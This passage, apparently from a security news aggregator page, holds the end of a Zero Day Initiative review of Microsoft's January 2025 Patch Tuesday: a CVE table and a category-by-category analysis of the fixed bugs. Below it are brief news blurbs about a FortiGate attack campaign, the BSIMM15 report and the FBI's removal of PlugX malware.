No No EoP CVE-2025-21327 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21341 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21291 Windows Direct Show Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21274 Windows Event Tracing Denial of Service Vulnerability Important 5.5 No No DoS CVE-2025-21301 Windows Geolocation Service Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-21382 Windows Graphics Component Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21269 Windows HTML Platforms Security Feature Bypass Vulnerability Important 4.3 No No SFB CVE-2025-21287 Windows Installer Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21331 Windows Installer Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-21218 Windows Kerberos Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21242 Windows Kerberos Information Disclosure Vulnerability Important 5.9 No No Info CVE-2025-21299 Windows Kerberos Security Feature Bypass Vulnerability Important 7.1 No No SFB CVE-2025-21316 † Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21317 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21318 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21319 † Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21320 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21321 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21323 Windows Kernel Memory Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21225 Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability Important 8.1 No No RCE CVE-2025-21276 Windows MapUrlToZone Denial of Service Vulnerability Important 7.5 No No SFB CVE-2025-21217 Windows Mark of the Web Spoofing Vulnerability Important 6.5 No No Spoofing CVE-2025-21234 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21235 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21202 Windows Recovery Environment Agent Elevation of Privilege Vulnerability Important 6.1 No No EoP CVE-2025-21226 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important 5.9 No No DoS CVE-2025-21278 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important 6.2 No No DoS CVE-2025-21330 Windows Remote Desktop Services Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21292 Windows Search Service Elevation of Privilege Vulnerability Important 8.8 No No EoP CVE-2025-21313 Windows Security Account Manager (SAM) Denial of Service Vulnerability Important 6.5 No No DoS CVE-2025-21312 Windows Smart Card Reader Information Disclosure Vulnerability Important 2.4 No No Info CVE-2025-21314 Windows SmartScreen Spoofing Vulnerability Important 6.5 No No Spoofing CVE-2025-21224 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21233 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21236 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21237 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21238 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21239 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21240 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21241 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21243 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21244 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21245 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21246 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21248 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21250 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21252 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21266 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21273 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21282 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21286 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21302 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21303 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21305 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21306 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21339 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21409 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21411 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21413 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21417 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21300 Windows upnphost.dll Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21389 Windows upnphost.dll Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21280 Windows Virtual Trusted Platform Module Denial of Service Vulnerability Important 5.5 No No DoS CVE-2025-21284 Windows Virtual Trusted Platform Module Denial of Service Vulnerability Important 5.5 No No DoS CVE-2025-21370 Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21340 Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability Important 5.5 No No SFB CVE-2025-21343 Windows Web Threat Defense User Service Information Disclosure Vulnerability Important 7.5 No No Info CVE-2025-21257 Windows WLAN AutoConfig Service Information Disclosure Vulnerability Important 5.5 No No Info * Indicates this CVE had been released by a third party and is now being included in Microsoft releases. † Indicates further administrative actions are required to fully address the vulnerability.Moving on to the other Critical-rated bugs, the vulnerability in Visual Studio requires a user to load a malicious package file. The bug in BranchCache is restricted to adjacent systems only. The bug in RMCAST requires a program listening on a Pragmatic General Multicast (PGM) port. Since there’s no authentication in PGM, these systems should not be exposed to the internet. However, on these systems, this bug is technically wormable – just only between systems configured in this manner. The NTLM bug is disturbing since it can be reached from the internet, but it only affects NTLMv1. You have updated everything to v2 – right? If not, Microsoft provides some guidance on making that happen. The bug in the Digest Authentication works in the same manner as the Remote Desktop bugs mentioned above. Finally, there a couple of other Critical bugs documented, but there’s no action for the end user as Microsoft already mitigated them.There are almost 60 code execution bugs receiving fixes this month, including several open-and-own bugs in Office components. This includes three publicly known bugs in Access. Only one of these bugs can be hit from the Preview Pane by previewing attachments, and that is for legacy versions of Outlook for Mac. The Windows Telephony Service receives 28 patches this month. However, these require user interaction and are unlikely to be exploited. The bug in Direct Show requires an authenticated user to click a malicious link. Beyond the open-and-own bug in .NET and Visual Studio, the other code execution vulnerability in .NET requires extensive user interaction. The bug in GDI+ also requires the attacker to be authenticated. Finally, the bug in the Line Printer Daemon reminds me of the PrintNightmare bugs from a few years ago. An attacker would just need to send a specially crafted request to an affected system to gain arbitrary code execution on the server. And yes, that is an update for Internet Explorer you see. No matter how hard we try, we can’t be rid of the thing. At least it requires user interaction.The January release includes more than three dozen privilege escalation bugs. However, most of these either lead to SYSTEM-level code execution or administrative privileges if an authenticated user runs specially crafted code. There are some notable exceptions. More than half of these are for the Digital Media component and require the attacker to plug in a USB drive into an affected system. This would lead to code execution as SYSTEM. The bug in the Recovery Environment also requires physical access, but Microsoft provides no further information on how it would be exploited. Several of the EoP fixes this month are related to container or sandbox escapes. For example, the bugs in the Brokering File System can be executed in a low-privileged AppContainer but result in access beyond what is intended. The bugs in PrintWorkflowUserSvc also result in sandbox escapes. The remaining bugs lead to access beyond what is intended, but these are not likely to be exploited due to their access complexity.There are a dozen different security feature bypass (SFB) bugs receiving fixes this month, and the one that immediately jumps out is the bypass of Mark of the Web (MoTW) protections. We saw this technique used often in 2024 by ransomware and crypto scammers. The bug in Excel evades macro protections. Similarly, the SFB in Office bypasses Windows Defender Application Control (WDAC) enforcement. There are multiple updates for this one, too, so make sure you get them all. The bugs in Secure Boot bypass – you guessed it – Secure Boot. They list the title as Kerberos, but the Windows Defender Credential Guard Feature is really what’s being bypassed, which could leak Kerberos credentials. The bugs bypassing MapUrlToZone and HTML Platform Security protections require user interaction. Microsoft provides no information on what is being bypassed in the Virtualization-Based Security (VBS) component, so let the speculation begin.This release includes fixes for multiple information disclosure bugs and most simply result in info leaks consisting of unspecified memory contents. There are a few that also lead to the disclosure of the ever-nebulous “sensitive information.” However, there are some significant information disclosure bugs receiving fixes this month. The first is in the SAP HANA SSO for On-Premises Data Gateway, which could disclose PowerBI data available from the dashboard. A few of the Kernel bugs are special as well. They only disclose random heap memory, but they require multiple patches to fully resolve the vulnerability. The bug in the Cryptographic component could leak the contents of encrypted PKCS1 information. The most troubling are the bugs in BitLocker. One could disclose unencrypted hibernation images in cleartext, while the other leaks the BitLocker key. Both of these require physical access, but since BitLocker is specifically designed to block attackers with physical access, it makes these bugs rather unfortunate.Microsoft must have heard our pleas because there is actually a small amount of detail given for the 20 Denial-of-Service (DoS) bugs being fixed this month. The bugs in Message Queuing impact the availability of the service when an attacker sends specially crafted packets to the service. That’s the same for the Connected Devices Platform Service (Cdpsvc). The bug in the IP Helper results in an application crash if specially crafted packets are received by the app. The bug in the Security Account Manager (SAM) would cause the app to crash, but it’s not clear if it would automatically restart. The bug in the TPM could result in a total loss of availability. Alas, we will need to cry louder, for that is all of the detail Microsoft provides regarding the DoS fixes this month.Finally, there are three spoofing bugs fixed in the release. The bug in SmartScreen looks awfully familiar, as the researcher credited has reported several spoofing bugs in SmartScreen. This always makes me think the previous patches were insufficient. The spoofing bug in SharePoint presents as a cross-site scripting (XSS) bug. No real information is given about the spoofing bug in Active Directory Federation Server other than to say that user interaction is required.No new advisories are being released this month.Looking AheadThe next Patch Tuesday of 2025 will be on February 11, and assuming I survive Pwn2Own Automotive, I’ll return with my analysis and thoughts about the release. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

by Zero Day Initiative Blog

An ongoing campaign targeting FortiGate devices with management interfaces exposed on the public Internet is leading to unauthorized administrative logins and configuration changes, creating new accounts, and performing SSL VPN authentication.

by Dark Reading

Organisations worldwide are ramping up efforts to tackle emerging security risks in artificial intelligence (AI) and software supply chains, according to the newly released BSIMM15 report from Black Duck. The report, which examines software security practices across 121 companies, reveals a sharp increase in activities aimed at strengthening defenses against evolving threats. Key findings from […] The post Companies Double Down on AI and Supply Chain Security, According to Black Duck’s BSIMM15 Report appeared first on IT Security Guru.

by IT Security Guru

The FBI says it was authorized to mass-remove “PlugX” malware from more than 4,000 compromised machines in the United States © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch